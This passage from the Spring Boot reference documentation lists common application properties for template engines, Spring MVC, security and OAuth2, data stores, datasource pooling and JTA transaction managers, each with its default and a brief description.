merging with the template.\n\tspring.groovy.template.expose-spring-macro-helpers=true # Set whether to expose a RequestContext for use by Spring's macro library, under the name \"springMacroRequestContext\".\n\tspring.groovy.template.prefix= # Prefix that gets prepended to view names when building a URL.\n\tspring.groovy.template.request-context-attribute= # Name of the RequestContext attribute for all views.\n\tspring.groovy.template.resource-loader-path=classpath:\/templates\/ # Template path.\n\tspring.groovy.template.suffix=.tpl # Suffix that gets appended to view names when building a URL.\n\tspring.groovy.template.view-names= # White list of view names that can be resolved.\n\n\t# SPRING HATEOAS ({sc-spring-boot-autoconfigure}\/hateoas\/HateoasProperties.{sc-ext}[HateoasProperties])\n\tspring.hateoas.use-hal-as-default-json-media-type=true # Specify if application\/hal+json responses should be sent to requests that accept application\/json.\n\n\t# HTTP message conversion\n\tspring.http.converters.preferred-json-mapper=jackson # Preferred JSON mapper to use for HTTP message conversion. Set to \"gson\" to force the use of Gson when both it and Jackson are on the classpath.\n\n\t# HTTP encoding ({sc-spring-boot-autoconfigure}\/web\/HttpEncodingProperties.{sc-ext}[HttpEncodingProperties])\n\tspring.http.encoding.charset=UTF-8 # Charset of HTTP requests and responses. Added to the \"Content-Type\" header if not set explicitly.\n\tspring.http.encoding.enabled=true # Enable http encoding support.\n\tspring.http.encoding.force=true # Force the encoding to the configured charset on HTTP requests and responses.\n\n\t# JACKSON ({sc-spring-boot-autoconfigure}\/jackson\/JacksonProperties.{sc-ext}[JacksonProperties])\n\tspring.jackson.date-format= # Date format string or a fully-qualified date format class name. For instance `yyyy-MM-dd HH:mm:ss`.\n\tspring.jackson.deserialization.*= # Jackson on\/off features that affect the way Java objects are deserialized.\n\tspring.jackson.generator.*= # Jackson on\/off features for generators.\n\tspring.jackson.joda-date-time-format= # Joda date time format string. If not configured, \"date-format\" will be used as a fallback if it is configured with a format string.\n\tspring.jackson.locale= # Locale used for formatting.\n\tspring.jackson.mapper.*= # Jackson general purpose on\/off features.\n\tspring.jackson.parser.*= # Jackson on\/off features for parsers.\n\tspring.jackson.property-naming-strategy= # One of the constants on Jackson's PropertyNamingStrategy. Can also be a fully-qualified class name of a PropertyNamingStrategy subclass.\n\tspring.jackson.serialization.*= # Jackson on\/off features that affect the way Java objects are serialized.\n\tspring.jackson.serialization-inclusion= # Controls the inclusion of properties during serialization. Configured with one of the values in Jackson's JsonInclude.Include enumeration.\n\tspring.jackson.time-zone= # Time zone used when formatting dates. For instance `America\/Los_Angeles`\n\n\t# JERSEY ({sc-spring-boot-autoconfigure}\/jersey\/JerseyProperties.{sc-ext}[JerseyProperties])\n\tspring.jersey.application-path= # Path that serves as the base URI for the application. Overrides the value of \"@ApplicationPath\" if specified.\n\tspring.jersey.filter.order=0 # Jersey filter chain order.\n\tspring.jersey.init.*= # Init parameters to pass to Jersey via the servlet or filter.\n\tspring.jersey.type=servlet # Jersey integration type. Can be either \"servlet\" or \"filter\".\n\n\t# SPRING MOBILE DEVICE VIEWS ({sc-spring-boot-autoconfigure}\/mobile\/DeviceDelegatingViewResolverAutoConfiguration.{sc-ext}[DeviceDelegatingViewResolverAutoConfiguration])\n\tspring.mobile.devicedelegatingviewresolver.enable-fallback=false # Enable support for fallback resolution.\n\tspring.mobile.devicedelegatingviewresolver.enabled=false # Enable device view resolver.\n\tspring.mobile.devicedelegatingviewresolver.mobile-prefix=mobile\/ # Prefix that gets prepended to view names for mobile devices.\n\tspring.mobile.devicedelegatingviewresolver.mobile-suffix= # Suffix that gets appended to view names for mobile devices.\n\tspring.mobile.devicedelegatingviewresolver.normal-prefix= # Prefix that gets prepended to view names for normal devices.\n\tspring.mobile.devicedelegatingviewresolver.normal-suffix= # Suffix that gets appended to view names for normal devices.\n\tspring.mobile.devicedelegatingviewresolver.tablet-prefix=tablet\/ # Prefix that gets prepended to view names for tablet devices.\n\tspring.mobile.devicedelegatingviewresolver.tablet-suffix= # Suffix that gets appended to view names for tablet devices.\n\n\t# SPRING MOBILE SITE PREFERENCE ({sc-spring-boot-autoconfigure}\/mobile\/SitePreferenceAutoConfiguration.{sc-ext}[SitePreferenceAutoConfiguration])\n\tspring.mobile.sitepreference.enabled=true # Enable SitePreferenceHandler.\n\n\t# MUSTACHE TEMPLATES ({sc-spring-boot-autoconfigure}\/mustache\/MustacheAutoConfiguration.{sc-ext}[MustacheAutoConfiguration])\n\tspring.mustache.cache=false # Enable template caching.\n\tspring.mustache.charset=UTF-8 # Template encoding.\n\tspring.mustache.check-template-location=true # Check that the templates location exists.\n\tspring.mustache.content-type=text\/html # Content-Type value.\n\tspring.mustache.enabled=true # Enable MVC view resolution for this technology.\n\tspring.mustache.prefix=classpath:\/templates\/ # Prefix to apply to template names.\n\tspring.mustache.suffix=.html # Suffix to apply to template names.\n\tspring.mustache.view-names= # White list of view names that can be resolved.\n\n\t# SPRING MVC ({sc-spring-boot-autoconfigure}\/web\/WebMvcProperties.{sc-ext}[WebMvcProperties])\n\tspring.mvc.async.request-timeout= # Amount of time (in milliseconds) before asynchronous request handling times out.\n\tspring.mvc.date-format= # Date format to use. For instance `dd\/MM\/yyyy`.\n\tspring.mvc.dispatch-trace-request=false # Dispatch TRACE requests to the FrameworkServlet doService method.\n\tspring.mvc.dispatch-options-request=false # Dispatch OPTIONS requests to the FrameworkServlet doService method.\n\tspring.mvc.favicon.enabled=true # Enable resolution of favicon.ico.\n\tspring.mvc.ignore-default-model-on-redirect=true # If the content of the \"default\" model should be ignored during redirect scenarios.\n\tspring.mvc.locale= # Locale to use.\n\tspring.mvc.media-types.*= # Maps file extensions to media types for content negotiation.\n\tspring.mvc.message-codes-resolver-format= # Formatting strategy for message codes. For instance `PREFIX_ERROR_CODE`.\n\tspring.mvc.static-path-pattern=\/** # Path pattern used for static resources.\n\tspring.mvc.throw-exception-if-no-handler-found=false # If a \"NoHandlerFoundException\" should be thrown if no Handler was found to process a request.\n\tspring.mvc.view.prefix= # Spring MVC view prefix.\n\tspring.mvc.view.suffix= # Spring MVC view suffix.\n\n\t# SPRING RESOURCES HANDLING ({sc-spring-boot-autoconfigure}\/web\/ResourceProperties.{sc-ext}[ResourceProperties])\n\tspring.resources.add-mappings=true # Enable default resource handling.\n\tspring.resources.cache-period= # Cache period for the resources served by the resource handler, in seconds.\n\tspring.resources.chain.cache=true # Enable caching in the Resource chain.\n\tspring.resources.chain.enabled= # Enable the Spring Resource Handling chain. Disabled by default unless at least one strategy has been enabled.\n\tspring.resources.chain.html-application-cache=false # Enable HTML5 application cache manifest rewriting.\n\tspring.resources.chain.strategy.content.enabled=false # Enable the content Version Strategy.\n\tspring.resources.chain.strategy.content.paths=\/** # Comma-separated list of patterns to apply to the Version Strategy.\n\tspring.resources.chain.strategy.fixed.enabled=false # Enable the fixed Version Strategy.\n\tspring.resources.chain.strategy.fixed.paths= # Comma-separated list of patterns to apply to the Version Strategy.\n\tspring.resources.chain.strategy.fixed.version= # Version string to use for the Version Strategy.\n\tspring.resources.static-locations=classpath:\/META-INF\/resources\/,classpath:\/resources\/,classpath:\/static\/,classpath:\/public\/ # Locations of static resources.\n\n\t# SPRING SOCIAL ({sc-spring-boot-autoconfigure}\/social\/SocialWebAutoConfiguration.{sc-ext}[SocialWebAutoConfiguration])\n\tspring.social.auto-connection-views=false # Enable the connection status view for supported providers.\n\n\t# SPRING SOCIAL FACEBOOK ({sc-spring-boot-autoconfigure}\/social\/FacebookAutoConfiguration.{sc-ext}[FacebookAutoConfiguration])\n\tspring.social.facebook.app-id= # your application's Facebook App ID\n\tspring.social.facebook.app-secret= # your application's Facebook App Secret\n\n\t# SPRING SOCIAL LINKEDIN ({sc-spring-boot-autoconfigure}\/social\/LinkedInAutoConfiguration.{sc-ext}[LinkedInAutoConfiguration])\n\tspring.social.linkedin.app-id= # your application's LinkedIn App ID\n\tspring.social.linkedin.app-secret= # your application's LinkedIn App Secret\n\n\t# SPRING SOCIAL TWITTER ({sc-spring-boot-autoconfigure}\/social\/TwitterAutoConfiguration.{sc-ext}[TwitterAutoConfiguration])\n\tspring.social.twitter.app-id= # your application's Twitter App ID\n\tspring.social.twitter.app-secret= # your application's Twitter App Secret\n\n\t# THYMELEAF ({sc-spring-boot-autoconfigure}\/thymeleaf\/ThymeleafAutoConfiguration.{sc-ext}[ThymeleafAutoConfiguration])\n\tspring.thymeleaf.cache=true # Enable template caching.\n\tspring.thymeleaf.check-template-location=true # Check that the templates location exists.\n\tspring.thymeleaf.content-type=text\/html # Content-Type value.\n\tspring.thymeleaf.enabled=true # Enable MVC Thymeleaf view resolution.\n\tspring.thymeleaf.encoding=UTF-8 # Template encoding.\n\tspring.thymeleaf.excluded-view-names= # Comma-separated list of view names that should be excluded from resolution.\n\tspring.thymeleaf.mode=HTML5 # Template mode to be applied to templates. See also StandardTemplateModeHandlers.\n\tspring.thymeleaf.prefix=classpath:\/templates\/ # Prefix that gets prepended to view names when building a URL.\n\tspring.thymeleaf.suffix=.html # Suffix that gets appended to view names when building a URL.\n\tspring.thymeleaf.template-resolver-order= # Order of the template resolver in the chain.\n\tspring.thymeleaf.view-names= # Comma-separated list of view names that can be resolved.\n\n\t# VELOCITY TEMPLATES ({sc-spring-boot-autoconfigure}\/velocity\/VelocityAutoConfiguration.{sc-ext}[VelocityAutoConfiguration])\n\tspring.velocity.allow-request-override=false # Set whether HttpServletRequest attributes are allowed to override (hide) controller generated model attributes of the same name.\n\tspring.velocity.allow-session-override=false # Set whether HttpSession attributes are allowed to override (hide) controller generated model attributes of the same name.\n\tspring.velocity.cache= # Enable template caching.\n\tspring.velocity.charset=UTF-8 # Template encoding.\n\tspring.velocity.check-template-location=true # Check that the templates location exists.\n\tspring.velocity.content-type=text\/html # Content-Type value.\n\tspring.velocity.date-tool-attribute= # Name of the DateTool helper object to expose in the Velocity context of the view.\n\tspring.velocity.enabled=true # Enable MVC view resolution for this technology.\n\tspring.velocity.expose-request-attributes=false # Set whether all request attributes should be added to the model prior to merging with the template.\n\tspring.velocity.expose-session-attributes=false # Set whether all HttpSession attributes should be added to the model prior to merging with the template.\n\tspring.velocity.expose-spring-macro-helpers=true # Set whether to expose a RequestContext for use by Spring's macro library, under the name \"springMacroRequestContext\".\n\tspring.velocity.number-tool-attribute= # Name of the NumberTool helper object to expose in the Velocity context of the view.\n\tspring.velocity.prefer-file-system-access=true # Prefer file system access for template loading. File system access enables hot detection of template changes.\n\tspring.velocity.prefix= # Prefix that gets prepended to view names when building a URL.\n\tspring.velocity.properties.*= # Additional velocity properties.\n\tspring.velocity.request-context-attribute= # Name of the RequestContext attribute for all views.\n\tspring.velocity.resource-loader-path=classpath:\/templates\/ # Template path.\n\tspring.velocity.suffix=.vm # Suffix that gets appended to view names when building a URL.\n\tspring.velocity.toolbox-config-location= # Velocity Toolbox config location. For instance `\/WEB-INF\/toolbox.xml`\n\tspring.velocity.view-names= # White list of view names that can be resolved.\n\n\n\t[[common-application-properties-security]]\n\t# ----------------------------------------\n\t# SECURITY PROPERTIES\n\t# ----------------------------------------\n\t# SECURITY ({sc-spring-boot-autoconfigure}\/security\/SecurityProperties.{sc-ext}[SecurityProperties])\n\tsecurity.basic.authorize-mode=role # Security authorize mode to apply.\n\tsecurity.basic.enabled=true # Enable basic authentication.\n\tsecurity.basic.path=\/** # Comma-separated list of paths to secure.\n\tsecurity.basic.realm=Spring # HTTP basic realm name.\n\tsecurity.enable-csrf=false # Enable Cross Site Request Forgery support.\n\tsecurity.filter-order=0 # Security filter chain order.\n\tsecurity.filter-dispatcher-types=ASYNC, FORWARD, INCLUDE, REQUEST # Security filter chain dispatcher types.\n\tsecurity.headers.cache=true # Enable cache control HTTP headers.\n\tsecurity.headers.content-type=true # Enable \"X-Content-Type-Options\" header.\n\tsecurity.headers.frame=true # Enable \"X-Frame-Options\" header.\n\tsecurity.headers.hsts= # HTTP Strict Transport Security (HSTS) mode (none, domain, all).\n\tsecurity.headers.xss=true # Enable cross site scripting (XSS) protection.\n\tsecurity.ignored= # Comma-separated list of paths to exclude from the default secured paths.\n\tsecurity.require-ssl=false # Enable secure channel for all requests.\n\tsecurity.sessions=stateless # Session creation policy (always, never, if_required, stateless).\n\tsecurity.user.name=user # Default user name.\n\tsecurity.user.password= # Password for the default user name. A random password is logged on startup by default.\n\tsecurity.user.role=USER # Granted roles for the default user name.\n\n\t# SECURITY OAUTH2 CLIENT ({sc-spring-boot-autoconfigure}\/security\/oauth2\/OAuth2ClientProperties.{sc-ext}[OAuth2ClientProperties]\n\tsecurity.oauth2.client.client-id= # OAuth2 client id.\n\tsecurity.oauth2.client.client-secret= # OAuth2 client secret. A random secret is generated by default\n\n\t# SECURITY OAUTH2 RESOURCES ({sc-spring-boot-autoconfigure}\/security\/oauth2\/resource\/ResourceServerProperties.{sc-ext}[ResourceServerProperties]\n\tsecurity.oauth2.resource.id= # Identifier of the resource.\n\tsecurity.oauth2.resource.jwt.key-uri= # The URI of the JWT token. Can be set if the value is not available and the key is public.\n\tsecurity.oauth2.resource.jwt.key-value= # The verification key of the JWT token. Can either be a symmetric secret or PEM-encoded RSA public key.\n\tsecurity.oauth2.resource.prefer-token-info=true # Use the token info, can be set to false to use the user info.\n\tsecurity.oauth2.resource.service-id=resource #\n\tsecurity.oauth2.resource.token-info-uri= # URI of the token decoding endpoint.\n\tsecurity.oauth2.resource.token-type= # The token type to send when using the userInfoUri.\n\tsecurity.oauth2.resource.user-info-uri= # URI of the user endpoint.\n\n\t# SECURITY OAUTH2 SSO ({sc-spring-boot-autoconfigure}\/security\/oauth2\/client\/OAuth2SsoProperties.{sc-ext}[OAuth2SsoProperties]\n\tsecurity.oauth2.sso.filter-order= # Filter order to apply if not providing an explicit WebSecurityConfigurerAdapter\n\tsecurity.oauth2.sso.login-path=\/login # Path to the login page, i.e. the one that triggers the redirect to the OAuth2 Authorization Server\n\n\n\t# ----------------------------------------\n\t# DATA PROPERTIES\n\t# ----------------------------------------\n\n\t# FLYWAY ({sc-spring-boot-autoconfigure}\/flyway\/FlywayProperties.{sc-ext}[FlywayProperties])\n\tflyway.baseline-description= #\n\tflyway.baseline-version=1 # version to start migration\n\tflyway.baseline-on-migrate= #\n\tflyway.check-location=false # Check that migration scripts location exists.\n\tflyway.clean-on-validation-error= #\n\tflyway.enabled=true # Enable flyway.\n\tflyway.encoding= #\n\tflyway.ignore-failed-future-migration= #\n\tflyway.init-sqls= # SQL statements to execute to initialize a connection immediately after obtaining it.\n\tflyway.locations=classpath:db\/migration # locations of migrations scripts\n\tflyway.out-of-order= #\n\tflyway.password= # JDBC password if you want Flyway to create its own DataSource\n\tflyway.placeholder-prefix= #\n\tflyway.placeholder-replacement= #\n\tflyway.placeholder-suffix= #\n\tflyway.placeholders.*= #\n\tflyway.schemas= # schemas to update\n\tflyway.sql-migration-prefix=V #\n\tflyway.sql-migration-separator= #\n\tflyway.sql-migration-suffix=.sql #\n\tflyway.table= #\n\tflyway.url= # JDBC url of the database to migrate. If not set, the primary configured data source is used.\n\tflyway.user= # Login user of the database to migrate.\n\tflyway.validate-on-migrate= #\n\n\t# LIQUIBASE ({sc-spring-boot-autoconfigure}\/liquibase\/LiquibaseProperties.{sc-ext}[LiquibaseProperties])\n\tliquibase.change-log=classpath:\/db\/changelog\/db.changelog-master.yaml # Change log configuration path.\n\tliquibase.check-change-log-location=true # Check the change log location exists.\n\tliquibase.contexts= # Comma-separated list of runtime contexts to use.\n\tliquibase.default-schema= # Default database schema.\n\tliquibase.drop-first=false # Drop the database schema first.\n\tliquibase.enabled=true # Enable liquibase support.\n\tliquibase.labels= # Comma-separated list of runtime labels to use.\n\tliquibase.parameters.*= # Change log parameters.\n\tliquibase.password= # Login password of the database to migrate.\n\tliquibase.url= # JDBC url of the database to migrate. If not set, the primary configured data source is used.\n\tliquibase.user= # Login user of the database to migrate.\n\n\t# DAO ({sc-spring-boot-autoconfigure}\/dao\/PersistenceExceptionTranslationAutoConfiguration.{sc-ext}[PersistenceExceptionTranslationAutoConfiguration])\n\tspring.dao.exceptiontranslation.enabled=true # Enable the PersistenceExceptionTranslationPostProcessor.\n\n\t# CASSANDRA ({sc-spring-boot-autoconfigure}\/cassandra\/CassandraProperties.{sc-ext}[CassandraProperties])\n\tspring.data.cassandra.cluster-name= # Name of the Cassandra cluster.\n\tspring.data.cassandra.compression= # Compression supported by the Cassandra binary protocol.\n\tspring.data.cassandra.connect-timeout-millis= # Socket option: connection time out.\n\tspring.data.cassandra.consistency-level= # Queries consistency level.\n\tspring.data.cassandra.contact-points=localhost # Comma-separated list of cluster node addresses.\n\tspring.data.cassandra.fetch-size= # Queries default fetch size.\n\tspring.data.cassandra.keyspace-name= # Keyspace name to use.\n\tspring.data.cassandra.load-balancing-policy= # Class name of the load balancing policy.\n\tspring.data.cassandra.port= # Port of the Cassandra server.\n\tspring.data.cassandra.password= # Login password of the server.\n\tspring.data.cassandra.read-timeout-millis= # Socket option: read time out.\n\tspring.data.cassandra.reconnection-policy= # Reconnection policy class.\n\tspring.data.cassandra.retry-policy= # Class name of the retry policy.\n\tspring.data.cassandra.serial-consistency-level= # Queries serial consistency level.\n\tspring.data.cassandra.ssl=false # Enable SSL support.\n\tspring.data.cassandra.username= # Login user of the server.\n\n\t# COUCHBASE ({sc-spring-boot-autoconfigure}\/couchbase\/CouchbaseProperties.{sc-ext}[CouchbaseProperties])\n\tspring.data.couchbase.auto-index=false # Automatically create views and indexes.\n spring.data.couchbase.bootstrap-hosts=localhost # Couchbase nodes (host or IP address) to bootstrap from.\n spring.data.couchbase.bucket.name= # Name of the bucket to connect to.\n spring.data.couchbase.bucket.password= # Password of the bucket.\n spring.data.couchbase.consistency=read-your-own-writes # Consistency to apply by default on generated queries.\n\n\t# ELASTICSEARCH ({sc-spring-boot-autoconfigure}\/elasticsearch\/ElasticsearchProperties.{sc-ext}[ElasticsearchProperties])\n\tspring.data.elasticsearch.cluster-name=elasticsearch # Elasticsearch cluster name.\n\tspring.data.elasticsearch.cluster-nodes= # Comma-separated list of cluster node addresses. If not specified, starts a client node.\n\tspring.data.elasticsearch.properties.*= # Additional properties used to configure the client.\n\tspring.data.elasticsearch.repositories.enabled=true # Enable Elasticsearch repositories.\n\n\t# MONGODB ({sc-spring-boot-autoconfigure}\/mongo\/MongoProperties.{sc-ext}[MongoProperties])\n\tspring.data.mongodb.authentication-database= # Authentication database name.\n\tspring.data.mongodb.database=test # Database name.\n\tspring.data.mongodb.field-naming-strategy= # Fully qualified name of the FieldNamingStrategy to use.\n\tspring.data.mongodb.grid-fs-database= # GridFS database name.\n\tspring.data.mongodb.host=localhost # Mongo server host.\n\tspring.data.mongodb.password= # Login password of the mongo server.\n\tspring.data.mongodb.port=27017 # Mongo server port.\n\tspring.data.mongodb.repositories.enabled=true # Enable Mongo repositories.\n\tspring.data.mongodb.uri=mongodb:\/\/localhost\/test # Mongo database URI. When set, host and port are ignored.\n\tspring.data.mongodb.username= # Login user of the mongo server.\n\n\t# DATA REST ({sc-spring-boot-autoconfigure}\/data\/rest\/RepositoryRestProperties.{sc-ext}[RepositoryRestProperties])\n\tspring.data.rest.base-path= # Base path to be used by Spring Data REST to expose repository resources.\n\tspring.data.rest.default-page-size= # Default size of pages.\n\tspring.data.rest.enable-enum-translation= # Enable enum value translation via the Spring Data REST default resource bundle.\n\tspring.data.rest.limit-param-name= # Name of the URL query string parameter that indicates how many results to return at once.\n\tspring.data.rest.max-page-size= # Maximum size of pages.\n\tspring.data.rest.page-param-name= # Name of the URL query string parameter that indicates what page to return.\n\tspring.data.rest.return-body-on-create= # Return a response body after creating an entity.\n\tspring.data.rest.return-body-on-update= # Return a response body after updating an entity.\n\tspring.data.rest.sort-param-name= # Name of the URL query string parameter that indicates what direction to sort results.\n\n\t# SOLR ({sc-spring-boot-autoconfigure}\/solr\/SolrProperties.{sc-ext}[SolrProperties])\n\tspring.data.solr.host=http:\/\/127.0.0.1:8983\/solr # Solr host. Ignored if \"zk-host\" is set.\n\tspring.data.solr.repositories.enabled=true # Enable Solr repositories.\n\tspring.data.solr.zk-host= # ZooKeeper host address in the form HOST:PORT.\n\n\t# DATASOURCE ({sc-spring-boot-autoconfigure}\/jdbc\/DataSourceAutoConfiguration.{sc-ext}[DataSourceAutoConfiguration] & {sc-spring-boot-autoconfigure}\/jdbc\/DataSourceProperties.{sc-ext}[DataSourceProperties])\n\tspring.datasource.continue-on-error=false # Do not stop if an error occurs while initializing the database.\n\tspring.datasource.data= # Data (DML) script resource reference.\n\tspring.datasource.dbcp.*= # Commons DBCP specific settings\n\tspring.datasource.dbcp2.*= # Commons DBCP2 specific settings\n\tspring.datasource.driver-class-name= # Fully qualified name of the JDBC driver. Auto-detected based on the URL by default.\n\tspring.datasource.hikari.*= # Hikari specific settings\n\tspring.datasource.initialize=true # Populate the database using 'data.sql'.\n\tspring.datasource.jmx-enabled=false # Enable JMX support (if provided by the underlying pool).\n\tspring.datasource.jndi-name= # JNDI location of the datasource. Class, url, username & password are ignored when set.\n\tspring.datasource.max-active= # For instance 100\n\tspring.datasource.max-idle= # For instance 8\n\tspring.datasource.max-wait=\n\tspring.datasource.min-evictable-idle-time-millis=\n\tspring.datasource.min-idle=8\n\tspring.datasource.name=testdb # Name of the datasource.\n\tspring.datasource.password= # Login password of the database.\n\tspring.datasource.platform=all # Platform to use in the schema resource (schema-${platform}.sql).\n\tspring.datasource.schema= # Schema (DDL) script resource reference.\n\tspring.datasource.separator=; # Statement separator in SQL initialization scripts.\n\tspring.datasource.sql-script-encoding= # SQL scripts encoding.\n\tspring.datasource.test-on-borrow= # For instance `false`\n\tspring.datasource.test-on-return= # For instance `false`\n\tspring.datasource.test-while-idle= #\n\tspring.datasource.time-between-eviction-runs-millis= 1\n\tspring.datasource.tomcat.*= # Tomcat datasource specific settings\n\tspring.datasource.type= # Fully qualified name of the connection pool implementation to use. By default, it is auto-detected from the classpath.\n\tspring.datasource.url= # JDBC url of the database.\n\tspring.datasource.username=\n\tspring.datasource.validation-query=\n\n\t# H2 Web Console ({sc-spring-boot-autoconfigure}\/h2\/H2ConsoleProperties.{sc-ext}[H2ConsoleProperties])\n\tspring.h2.console.enabled=false # Enable the console.\n\tspring.h2.console.path=\/h2-console # Path at which the console will be available.\n\n\t# JOOQ ({sc-spring-boot-autoconfigure}\/jooq\/JooqAutoConfiguration.{sc-ext}[JooqAutoConfiguration])\n\tspring.jooq.sql-dialect= # SQLDialect JOOQ used when communicating with the configured datasource. For instance `POSTGRES`\n\n\t# JPA ({sc-spring-boot-autoconfigure}\/orm\/jpa\/JpaBaseConfiguration.{sc-ext}[JpaBaseConfiguration], {sc-spring-boot-autoconfigure}\/orm\/jpa\/HibernateJpaAutoConfiguration.{sc-ext}[HibernateJpaAutoConfiguration])\n\tspring.data.jpa.repositories.enabled=true # Enable JPA repositories.\n\tspring.jpa.database= # Target database to operate on, auto-detected by default. Can be alternatively set using the \"databasePlatform\" property.\n\tspring.jpa.database-platform= # Name of the target database to operate on, auto-detected by default. Can be alternatively set using the \"Database\" enum.\n\tspring.jpa.generate-ddl=false # Initialize the schema on startup.\n\tspring.jpa.hibernate.ddl-auto= # DDL mode. This is actually a shortcut for the \"hibernate.hbm2ddl.auto\" property. Default to \"create-drop\" when using an embedded database, \"none\" otherwise.\n\tspring.jpa.hibernate.naming-strategy= # Naming strategy fully qualified name.\n\tspring.jpa.open-in-view=true # Register OpenEntityManagerInViewInterceptor. Binds a JPA EntityManager to the thread for the entire processing of the request.\n\tspring.jpa.properties.*= # Additional native properties to set on the JPA provider.\n\tspring.jpa.show-sql=false # Enable logging of SQL statements.\n\n\t# JTA ({sc-spring-boot-autoconfigure}\/transaction\/jta\/JtaAutoConfiguration.{sc-ext}[JtaAutoConfiguration])\n\tspring.jta.enabled=true # Enable JTA support.\n spring.jta.log-dir= # Transaction logs directory.\n spring.jta.transaction-manager-id= # Transaction manager unique identifier.\n\n\t# ATOMIKOS\n\tspring.jta.atomikos.connectionfactory.borrow-connection-timeout=30 # Timeout, in seconds, for borrowing connections from the pool.\n\tspring.jta.atomikos.connectionfactory.ignore-session-transacted-flag=true # Whether or not to ignore the transacted flag when creating session.\n\tspring.jta.atomikos.connectionfactory.local-transaction-mode=false # Whether or not local transactions are desired.\n\tspring.jta.atomikos.connectionfactory.maintenance-interval=60 # The time, in seconds, between runs of the pool's maintenance thread.\n\tspring.jta.atomikos.connectionfactory.max-idle-time=60 # The time, in seconds, after which connections are cleaned up from the pool.\n\tspring.jta.atomikos.connectionfactory.max-lifetime=0 # The time, in seconds, that a connection can be pooled for before being destroyed. 0 denotes no limit.\n\tspring.jta.atomikos.connectionfactory.max-pool-size=1 # The maximum size of the pool.\n\tspring.jta.atomikos.connectionfactory.min-pool-size=1 # The minimum size of the pool.\n\tspring.jta.atomikos.connectionfactory.reap-timeout=0 # The reap timeout, in seconds, for borrowed connections. 0 denotes no limit.\n\tspring.jta.atomikos.connectionfactory.unique-resource-name=jmsConnectionFactory # The unique name used to identify the resource during recovery.\n\tspring.jta.atomikos.datasource.borrow-connection-timeout=30 # Timeout, in seconds, for borrowing connections from the pool.\n\tspring.jta.atomikos.datasource.default-isolation-level= # Default isolation level of connections provided by the pool.\n\tspring.jta.atomikos.datasource.login-timeout= # Timeout, in seconds, for establishing a database connection.\n\tspring.jta.atomikos.datasource.maintenance-interval=60 # The time, in seconds, between runs of the pool's maintenance thread.\n\tspring.jta.atomikos.datasource.max-idle-time=60 # The time, in seconds, after which connections are cleaned up from the pool.\n\tspring.jta.atomikos.datasource.max-lifetime=0 # The time, in seconds, that a connection can be pooled for before being destroyed. 0 denotes no limit.\n\tspring.jta.atomikos.datasource.max-pool-size=1 # The maximum size of the pool.\n\tspring.jta.atomikos.datasource.min-pool-size=1 # The minimum size of the pool.\n\tspring.jta.atomikos.datasource.reap-timeout=0 # The reap timeout, in seconds, for borrowed connections. 0 denotes no limit.\n\tspring.jta.atomikos.datasource.test-query= # SQL query or statement used to validate a connection before returning it.\n\tspring.jta.atomikos.datasource.unique-resource-name=dataSource # The unique name used to identify the resource during recovery.\n\tspring.jta.atomikos.properties.checkpoint-interval=500 # Interval between checkpoints.\n\tspring.jta.atomikos.properties.console-file-count=1 # Number of debug logs files that can be created.\n\tspring.jta.atomikos.properties.console-file-limit=-1 # How many bytes can be stored at most in debug logs files.\n\tspring.jta.atomikos.properties.console-file-name=tm.out # Debug logs file name.\n\tspring.jta.atomikos.properties.console-log-level= # Console log level.\n\tspring.jta.atomikos.properties.default-jta-timeout=10000 # Default timeout for JTA transactions.\n\tspring.jta.atomikos.properties.enable-logging=true # Enable disk logging.\n\tspring.jta.atomikos.properties.force-shutdown-on-vm-exit=false # Specify if a VM shutdown should trigger forced shutdown of the transaction core.\n\tspring.jta.atomikos.properties.log-base-dir= # Directory in which the log files should be stored.\n\tspring.jta.atomikos.properties.log-base-name=tmlog # Transactions log file base name.\n\tspring.jta.atomikos.properties.max-actives=50 # Maximum number of active transactions.\n\tspring.jta.atomikos.properties.max-timeout=300000 # Maximum timeout (in milliseconds) that can be allowed for transactions.\n\tspring.jta.atomikos.properties.output-dir= # Directory in which to store the debug log files.\n\tspring.jta.atomikos.properties.serial-jta-transactions=true # Specify if sub-transactions should be joined when possible.\n\tspring.jta.atomikos.properties.service= # Transaction manager implementation that should be started.\n\tspring.jta.atomikos.properties.threaded-two-phase-commit=true # Use different (and concurrent) threads for two-phase commit on the participating resources.\n\tspring.jta.atomikos.properties.transaction-manager-unique-name= # Transaction manager's unique name.\n\n\t# BITRONIX\n\tspring.jta.bitronix.connectionfactory.acquire-increment=1 # Number of connections to create when growing the pool.\n\tspring.jta.bitronix.connectionfactory.acquisition-interval=1 # Time, in seconds, to wait before trying to acquire a connection again after an invalid connection was acquired.\n\tspring.jta.bitronix.connectionfactory.acquisition-timeout=30 # Timeout, in seconds, for acquiring connections from the pool.\n\tspring.jta.bitronix.connectionfactory.allow-local-transactions=true # Whether or not the transaction manager should allow mixing XA and non-XA transactions.\n\tspring.jta.bitronix.connectionfactory.apply-transaction-timeout=false # Whether or not the transaction timeout should be set on the XAResource when it is enlisted.\n\tspring.jta.bitronix.connectionfactory.automatic-enlisting-enabled=true # Whether or not resources should be enlisted and delisted automatically.\n\tspring.jta.bitronix.connectionfactory.cache-producers-consumers=true # Whether or not produces and consumers should be cached.\n\tspring.jta.bitronix.connectionfactory.defer-connection-release=true # Whether or not the provider can run many transactions on the same connection and supports transaction interleaving.\n\tspring.jta.bitronix.connectionfactory.ignore-recovery-failures=false # Whether or not recovery failures should be ignored.\n\tspring.jta.bitronix.connectionfactory.max-idle-time=60 # The time, in seconds, after which connections are cleaned up from the pool.\n\tspring.jta.bitronix.connectionfactory.max-pool-size=10 # The maximum size of the pool. 0 denotes no limit.\n\tspring.jta.bitronix.connectionfactory.min-pool-size=0 # The minimum size of the pool.\n\tspring.jta.bitronix.connectionfactory.password= # The password to use to connect to the JMS provider.\n\tspring.jta.bitronix.connectionfactory.share-transaction-connections=false # Whether or not connections in the ACCESSIBLE state can be shared within the context of a transaction.\n\tspring.jta.bitronix.connectionfactory.test-connections=true # Whether or not connections should be tested when acquired from the pool.\n\tspring.jta.bitronix.connectionfactory.two-pc-ordering-position=1 # The position that this resource should take during two-phase commit (always first is Integer.MIN_VALUE, always last is Integer.MAX_VALUE).\n\tspring.jta.bitronix.connectionfactory.unique-name=jmsConnectionFactory # The unique name used to identify the resource during recovery.\n\tspring.jta.bitronix.connectionfactory.use-tm-join=true Whether or not TMJOIN should be used when starting XAResources.\n\tspring.jta.bitronix.connectionfactory.user= # The user to use to connect to the JMS provider.\n\tspring.jta.bitronix.datasource.acquire-increment=1 # Number of connections to create when growing the pool.\n\tspring.jta.bitronix.datasource.acquisition-interval=1 # Time, in seconds, to wait before trying to acquire a connection again after an invalid connection was 